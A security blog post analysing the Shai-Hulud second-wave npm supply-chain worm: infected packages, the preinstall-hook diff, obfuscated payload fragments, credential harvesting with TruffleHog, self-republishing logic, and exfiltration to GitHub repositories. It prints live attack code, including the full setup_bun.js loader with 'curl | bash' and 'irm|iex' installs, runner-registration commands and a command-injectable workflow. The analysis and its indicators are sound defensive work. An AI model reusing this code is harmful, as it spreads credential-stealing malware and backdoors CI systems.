TL;DR

The Shai-Hulud attackers are back with a new supply chain attack targeting the npm ecosystem. Multiple popular packages were infected with malicious payload via preinstall script. In this blog, we will do a deep dive technical analysis of the payload and the attack.

Infected packages:

• [email protected]
• [email protected]
• [email protected]

Note: This is a non-exhaustive list of infected packages. More packages will be added to this list as we continue to analyze the attack. Our current focus is on the payload and technical analysis of the attack. Our assumption is that the same payload is used in all affected packages in this incident with minor variations and bug fixes.

The payload appears to share similar code and behavior with the previous Shai-Hulud supply chain attack targeting npm packages. The major difference, so far, appears to be the use of bun instead of node to execute the payload.

Following illustration gives a high level overview of the payload.

Based on analysis of the obfuscated payload, the malware seems to support the following platforms:

• Linux
• macOS
• Windows

Technical Analysis

The following is a technical analysis of an infected version of zapier-sdk package to identify the payload. We assume the same payload is used in all affected packages in this incident with minor variations and bug fixes.

We start by diffing version 0.15.4 and 0.15.5 of zapier-sdk package to identify the malicious changes introduced in 0.15.5 which is a known malicious package.

1
diff -Naur zapier/0.15.4/package/package.json zapier/0.15.5/package/package.json

1
--- zapier/0.15.4/package/package.json  1985-10-26 13:45:00
2
+++ zapier/0.15.5/package/package.json  2025-11-24 11:20:51
3
@@ -1,6 +1,6 @@
4
 {
5
   "name": "@zapier/zapier-sdk",
6
-  "version": "0.15.4",
7
+  "version": "0.15.5",
8
   "description": "Complete Zapier SDK - combines all Zapier SDK packages",
9
   "main": "dist/index.cjs",
10
   "module": "dist/index.mjs",
11
@@ -59,6 +59,7 @@
12
     "rebuild": "pnpm clean && pnpm build",
13
     "dev": "tsc --watch",
14
     "typecheck": "tsc --project tsconfig.build.json --noEmit",
15
-    "test": "vitest"
16
+    "test": "vitest",
17
+    "preinstall": "node setup_bun.js"
18
   }
19
 }

The diff indicates that a new preinstall script was introduced in 0.15.5 that executes setup_bun.js leveraging npm preinstall hook. The setup_bun.js has the following purpose:

• Checks if bun is already on the system path
• If not, downloads and installs bun
• Executes bun_environment.js using bun executable found on the system or downloaded and installed by this script

Based on the analysis of setup_bun.js, it appears that the payload is in bun_environment.js and requires bun to be executed.

Analysis of bun_environment.js

• bun_environment.js is a 9.7MB file
• SHA256 (bun_environment.js) = 62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0

Looking at bun_environment.js, it is evident that the payload is obfuscated. The first step was to beautify the code to make it a bit more readable, although still obfuscated.

Note: All command execution, analysis and code beautification was done inside a sandbox environment to prevent any malicious code from being executed.

1
docker run -it --rm -v $(pwd):/app node:lts bash
2
cd /app
3
npm install -g js-beautify
4
js-beautify bun_environment.js > bun_environment_beautified.js

1
more bun_environment_beautified.js

1
var a0_0x58e7a2 = a0_0x5155;
2
(function(_0x488e1f, _0x239640) {
3
    var _0x1c90e8 = a0_0x5155,
4
        _0x2d2cb3 = _0x488e1f();
5
    while (!![]) {
6
        try {
7
            var _0x156b43 = parseInt(_0x1c90e8(0x52cd)) / 0x1 * (-parseInt(_0x1c90e8(0x2dae)) / 0x2) + parseInt(_0x1c90e8(0x49ef)) / 0x3 * (parseInt(_0x1c90e8(0x373)) / 0x
8
4) + parseInt(_0x1c90e8(0x2c8a)) / 0x5 * (-parseInt(_0x1c90e8(0x3b09)) / 0x6) + parseInt(_0x1c90e8(0x2336)) / 0x7 * (-parseInt(_0x1c90e8(0x34cf)) / 0x8) + parseInt(_0x1c90
9
e8(0x18ad)) / 0x9 * (parseInt(_0x1c90e8(0x13ba)) / 0xa) + parseInt(_0x1c90e8(0xeef)) / 0xb + parseInt(_0x1c90e8(0x17a8)) / 0xc;
10
            if (_0x156b43 === _0x239640) break;
11
            else _0x2d2cb3['push'](_0x2d2cb3['shift']());
12
        } catch (_0x1d8237) {
13
            _0x2d2cb3['push'](_0x2d2cb3['shift']());
14
        }
15
    }
16
}(a0_0x29d6, 0xc51e0));

Manual analysis of the obfuscated payload reveals the following, indicating that the file uses obfuscator.io style obfuscation with following techniques:

Additionally, the payload appears to be packaged with all its dependencies similar to the previous Shai-Hulud supply chain attack which makes analysis of the payload more challenging.

Payload Summary

Following behaviors are observed in the payload:

• AWS, GCP, and Azure credentials harvesting using TruffleHog
• AWS Secrets Manager credentials harvesting using AWS API and locally cached credentials
• Google Cloud credentials harvesting using Google Cloud API and locally cached credentials
• Self-replicating worm like behavior using npm packages that are accessible to the authenticated user
• Credential exposure using GitHub repositories
• Deploys malicious GitHub Actions runner to the compromised machine

CI/CD Detection

The payload checks if the bun process is running in a CI/CD environment by checking the following environment variables:

• BUILDKITE
• PROJECT_ID
• GITHUB_ACTIONS
• CODEBUILD_BUILD_NUMBER
• CIRCLE_SHA1
• GITLAB_CI
• JENKINS_HOME

1
if ('CI' in _0x26282e) {
2
  if (
3
    [_0x17a1ce(0x5955), _0x17a1ce(0x3eda), _0x17a1ce(0x54b5), 'GITLAB_CI', 'GITHUB_ACTIONS', _0x17a1ce(0x4bd6)]['some'](
4
      (_0x1fc8b3) => _0x1fc8b3 in _0x26282e
5
    ) ||
6
    _0x26282e[_0x17a1ce(0x5dde)] === 'codeship'
7
  )
8
    return 0x1;
9
  return _0x3a4b4b;
10
}
11
if ('TEAMCITY_VERSION' in _0x26282e)
12
  return /^(9\.(0*[1-9]\d*)\.|\d{2,}\.)/[_0x17a1ce(0x57e)](_0x26282e[_0x17a1ce(0x5537)]) ? 0x1 : 0x0;

Exfiltrate CI/CD Credentials using Malicious GitHub Actions Runner

The payload creates a malicious GitHub Actions runner using compromised user’s with name SHA1HULUD. The compromised machine is used as the runner to execute a malicious workflow. The following code snippet shows the code used to create the malicious GitHub Actions runner:

Deploy a GitHub Actions runner on the compromised machine using the following code snippet. The payload supports Linux, macOS, and Windows platforms as the host for deploying the malicious GitHub Actions runner.

1
if (a0_0x5a88b3.platform() === 'linux')
2
  (await Bun.$`mkdir -p $HOME/.dev-env/`,
3
    await Bun.$`curl -o actions-runner-linux-x64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-linux-x64-2.330.0.tar.gz`
4
      .cwd(a0_0x5a88b3.homedir + '/.dev-env')
5
      .quiet(),
6
    await Bun.$`tar xzf ./actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + '/.dev-env'),
7
    await Bun.$`RUNNER_ALLOW_RUNASROOT=1 ./config.sh --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`
8
      .cwd(a0_0x5a88b3.homedir + '/.dev-env')
9
      .quiet(),
10
    await Bun.$`rm actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + '/.dev-env'),
11
    Bun.spawn(['bash', '-c', 'cd $HOME/.dev-env && nohup ./run.sh &']).unref());

It then creates a malicious workflow in the newly created GitHub repository using the following code snippet:

1
await this.octokit.request('PUT /repos/{owner}/{repo}/contents/{path}', {
2
  owner: _0x349291,
3
  repo: _0x2b1a39,
4
  path: '.github/workflows/discussion.yaml',
5
  message: 'Add Discusion',
6
  content: Buffer.from(rZ1).toString('base64'),
7
  branch: 'main',
8
});

The malicious workflow is a discussion.yaml file that contains the following code snippet:

1
name: Discussion Create
2
on:
3
  discussion:
4
jobs:
5
  process:
6
    env:
7
      RUNNER_TRACKING_ID: 0
8
    runs-on: self-hosted
9
    steps:
10
      - uses: actions/checkout@v5
11
      - name: Handle Discussion
12
        run: echo ${{ github.event.discussion.body }}

The echo command is used to print the discussion body to the console. This is likely an incomplete feature and may allow remote code execution (RCE) primitive to the attacker on victim’s machine through the discussion body.

Self-replicating worm like behavior

Like its predecessors, the payload has self-replicating worm like behavior to infect npm packages that are accessible to the authenticated user. To achieve this, the payload does the following:

• Finds the infected user’s npm token from the .npmrc file
• Calls https://registry.npmjs.org/-/whoami to validate the token and retrieve the username
• Searches for packages that are accessible to the authenticated user as a maintainer using the /-/v1/search?text=maintainer:<username> API
• If a package is found, the payload downloads and infects it to create a new infected version

The package infection process is as follows:

1. Download Target Package

• Fetches the package tarball from the registry using the authenticated user’s npm token
• Downloads the tarball to a temporary directory using Bun.write()

2. Extract and Modify Package

• Extracts the tarball using gzip decompression
• Reads the package.json of the target package
• Injects a malicious preinstall script: node setup_bun.js
• Automatically increments the patch version (e.g., 1.0.0 to 1.0.1) to create a new “legitimate-looking” release

3. Bundle Malicious Assets

• Calls bundleAssets() to inject the complete malware payload (setup_bun.js and bun_environment.js)
• Repackages everything into a new tarball (updated.tgz)

4. Publish Infected Package

• Uses npm publish command with the compromised user’s NPM_CONFIG_TOKEN
• Publishes the infected package as a new version to the npm registry
• Cleans up temporary files after successful publication

1
(await Bun['$']`npm publish ${_0x4fc35c}`[_0x545fd9(0x3f2d)]({
2
  ...process[_0x545fd9(0x3f2d)],
3
  NPM_CONFIG_TOKEN: this[_0x545fd9(0x194f)],
4
}),
5
  await Uy1(_0x14f0bf));

This automated infection pipeline enables the malware to spread exponentially across the npm ecosystem, as each infected package becomes a vector for further compromise. The use of bun runtime provides faster execution and potentially better evasion of Node.js based security tools.

Credential Harvesting using TruffleHog

The payload uses TruffleHog to harvest credentials from the local filesystem. Following code snippet shows the code used to harvest credentials using TruffleHog:

Detect or download TruffleHog binary from GitHub releases using URL https://api.github.com/repos/trufflesecurity/trufflehog/releases/latest.

1
let _0x8d5d38 = await this.fetchLatestRelease(),
2
  _0xadd65e = this.pickAsset(_0x8d5d38.assets);
3
if (!_0xadd65e) throw Error('No suitable trufflehog binary found for this platform');
4
let _0x23fc54 = a0_0x2cdffb(this.config.cacheDir, _0xadd65e.name);
5
(await this.downloadFile(_0xadd65e.browser_download_url, _0x23fc54),
6
  (this.binaryPath = await this.extractAndInstall(_0x23fc54)));

Scan filesystem:

1
async .scanFilesystem(_0x318465, _0x2ad348 = []) {
2
    await this.initialize();
3
    let _0x423574 = ["filesystem", _0x318465, "--json", ..._0x2ad348];
4
    return this.executeWithTimeout(_0x423574);
5
}

Similarly, the payload uses following scanning techniques using TruffleHog:

• Scan git repositories
• Filter by verified results (using TruffleHog’s verification feature)
• Filter findings by TruffleHog detector
• Filter findings by file path

These filters are likely to allow the payload to harvest meaningful credentials from the local filesystem.

Credential Exfiltration using GitHub

The payload creates GitHub repositories using compromised user’s credentials with 18 characters long random name. More than 25000 repositories were exposed by this attack at the time of writing this blog. The repositories are created with the description Sha1-Hulud: The Second Coming. text. See GitHub repository search to find currently exposed repositories.

Note: GitHub periodically takes down compromised repositories to prevent further exposure.

The payload uploads the following files to the newly created GitHub repository:

• cloud.json, contains AWS, GCP, and Azure credentials
• contents.json, contains host details and other credentials such as GitHub token, npm token, etc.
• environment.json, contains environment variables of the running process
• truffleSecrets.json, contains JSON output of TruffleHog scan

Each of these files are double base64 encoded and uploaded to the newly created GitHub repository. Example of cloud.json file:

1
cat cloud.json| base64 -d | base64 -d

Example output with credentials redacted:

1
{ "aws": { "secrets": [] }, "gcp": { "secrets": [] }, "azure": { "secrets": [] } }

1
cat contents.json| base64 -d | base64 -d

1
{
2
  "system": {
3
    "platform": "linux",
4
    "architecture": "x64",
5
    "platformDetailed": "linux",
6
    "architectureDetailed": "x64",
7
    "hostname": "<REDACTED>",
8
    "os_user": {
9
      "homedir": "/home/runner",
10
      "username": "runner",
11
      "shell": "/bin/bash",
12
      "uid": 1001,
13
      "gid": 1001
14
    }
15
  },
16
  "modules": {
17
    "github": {
18
      "authenticated": true,
19
      "token": "<REDACTED>",
20
      "username": {
21
        "login": "<REDACTED>",
22
        "name": "<REDACTED>",
23
        "email": null,
24
        "publicRepos": <REDACTED>,
25
        "followers": <REDACTED>,
26
        "following": <REDACTED>,
27
        "createdAt": "<REDACTED>"
28
      }
29
    }
30
  }
31
}

The homedir and username above indicates the payload is executed by a GitHub Actions runner, which in turn indicates that compromised version of packages were introduced in the GitHub Actions runner environment.

Appendix

Indicators of Compromise (IOC)

• SHA256 (zapier/0.15.5/package/setup_bun.js) = a3894003ad1d293ba96d77881ccd2071446dc3f65f434669b49b3da92421901a
• SHA256 (zapier/0.15.5/package/bun_environment.js) = 62ee164b9b306250c1172583f138c9614139264f889fa99614903c12755468d0
• Sha1-Hulud: The Second Coming. text in GitHub repository description created by the payload

setup_bun.js

1
#!/usr/bin/env node
2
const { spawn, execSync } = require('child_process');
3
const path = require('path');
4
const fs = require('fs');
5
const os = require('os');
6

7
function isBunOnPath() {
8
  try {
9
    const command = process.platform === 'win32' ? 'where bun' : 'which bun';
10
    execSync(command, { stdio: 'ignore' });
11
    return true;
12
  } catch {
13
    return false;
14
  }
15
}
16

17
function reloadPath() {
18
  // Reload PATH environment variable
19
  if (process.platform === 'win32') {
20
    try {
21
      // On Windows, get updated PATH from registry
22
      const result = execSync(
23
        "powershell -c \"[Environment]::GetEnvironmentVariable('PATH', 'User') + ';' + [Environment]::GetEnvironmentVariable('PATH', 'Machine')\"",
24
        {
25
          encoding: 'utf8',
26
        }
27
      );
28
      process.env.PATH = result.trim();
29
    } catch {}
30
  } else {
31
    try {
32
      // On Unix systems, source common shell profile files
33
      const homeDir = os.homedir();
34
      const profileFiles = [
35
        path.join(homeDir, '.bashrc'),
36
        path.join(homeDir, '.bash_profile'),
37
        path.join(homeDir, '.profile'),
38
        path.join(homeDir, '.zshrc'),
39
      ];
40

41
      // Try to source profile files to get updated PATH
42
      for (const profileFile of profileFiles) {
43
        if (fs.existsSync(profileFile)) {
44
          try {
45
            const result = execSync(`bash -c "source ${profileFile} && echo $PATH"`, {
46
              encoding: 'utf8',
47
              stdio: ['pipe', 'pipe', 'ignore'],
48
            });
49
            if (result && result.trim()) {
50
              process.env.PATH = result.trim();
51
              break;
52
            }
53
          } catch {
54
            // Continue to next profile file
55
          }
56
        }
57
      }
58

59
      // Also check if ~/.bun/bin exists and add it to PATH if not already there
60
      const bunBinDir = path.join(homeDir, '.bun', 'bin');
61
      if (fs.existsSync(bunBinDir) && !process.env.PATH.includes(bunBinDir)) {
62
        process.env.PATH = `${bunBinDir}:${process.env.PATH}`;
63
      }
64
    } catch {}
65
  }
66
}
67

68
async function downloadAndSetupBun() {
69
  try {
70
    let command;
71
    if (process.platform === 'win32') {
72
      // Windows: Use PowerShell script
73
      command = 'powershell -c "irm bun.sh/install.ps1|iex"';
74
    } else {
75
      // Linux/macOS: Use curl + bash script
76
      command = 'curl -fsSL https://bun.sh/install | bash';
77
    }
78

79
    execSync(command, {
80
      stdio: 'ignore',
81
      env: { ...process.env },
82
    });
83

84
    // Reload PATH to pick up newly installed bun
85
    reloadPath();
86

87
    // Find bun executable after installation
88
    const bunPath = findBunExecutable();
89
    if (!bunPath) {
90
      throw new Error('Bun installation completed but executable not found');
91
    }
92

93
    return bunPath;
94
  } catch {
95
    process.exit(0);
96
  }
97
}
98

99
function findBunExecutable() {
100
  // Common locations where bun might be installed
101
  const possiblePaths = [];
102

103
  if (process.platform === 'win32') {
104
    // Windows locations
105
    const userProfile = process.env.USERPROFILE || '';
106
    possiblePaths.push(
107
      path.join(userProfile, '.bun', 'bin', 'bun.exe'),
108
      path.join(userProfile, 'AppData', 'Local', 'bun', 'bun.exe')
109
    );
110
  } else {
111
    // Unix locations
112
    const homeDir = os.homedir();
113
    possiblePaths.push(path.join(homeDir, '.bun', 'bin', 'bun'), '/usr/local/bin/bun', '/opt/bun/bin/bun');
114
  }
115

116
  // Check if bun is now available on PATH
117
  if (isBunOnPath()) {
118
    return 'bun';
119
  }
120

121
  // Check common installation paths
122
  for (const bunPath of possiblePaths) {
123
    if (fs.existsSync(bunPath)) {
124
      return bunPath;
125
    }
126
  }
127

128
  return null;
129
}
130

131
function runExecutable(execPath, args = [], opts = {}) {
132
  const child = spawn(execPath, args, {
133
    stdio: 'ignore',
134
    cwd: opts.cwd || process.cwd(),
135
    env: Object.assign({}, process.env, opts.env || {}),
136
  });
137

138
  child.on('error', (err) => {
139
    process.exit(0);
140
  });
141

142
  child.on('exit', (code, signal) => {
143
    if (signal) {
144
      process.exit(0);
145
    } else {
146
      process.exit(code === null ? 1 : code);
147
    }
148
  });
149
}
150

151
// Main execution
152
async function main() {
153
  let bunExecutable;
154

155
  if (isBunOnPath()) {
156
    // Use bun from PATH
157
    bunExecutable = 'bun';
158
  } else {
159
    // Check if we have a locally downloaded bun
160
    const localBunDir = path.join(__dirname, 'bun-dist');
161
    const possiblePaths = [
162
      path.join(localBunDir, 'bun', 'bun'),
163
      path.join(localBunDir, 'bun', 'bun.exe'),
164
      path.join(localBunDir, 'bun.exe'),
165
      path.join(localBunDir, 'bun'),
166
    ];
167

168
    const existingBun = possiblePaths.find((p) => fs.existsSync(p));
169

170
    if (existingBun) {
171
      bunExecutable = existingBun;
172
    } else {
173
      // Download and setup bun
174
      bunExecutable = await downloadAndSetupBun();
175
    }
176
  }
177

178
  const environmentScript = path.join(__dirname, 'bun_environment.js');
179
  if (fs.existsSync(environmentScript)) {
180
    runExecutable(bunExecutable, [environmentScript]);
181
  } else {
182
    process.exit(0);
183
  }
184
}
185

186
main().catch((error) => {
187
  process.exit(0);
188
});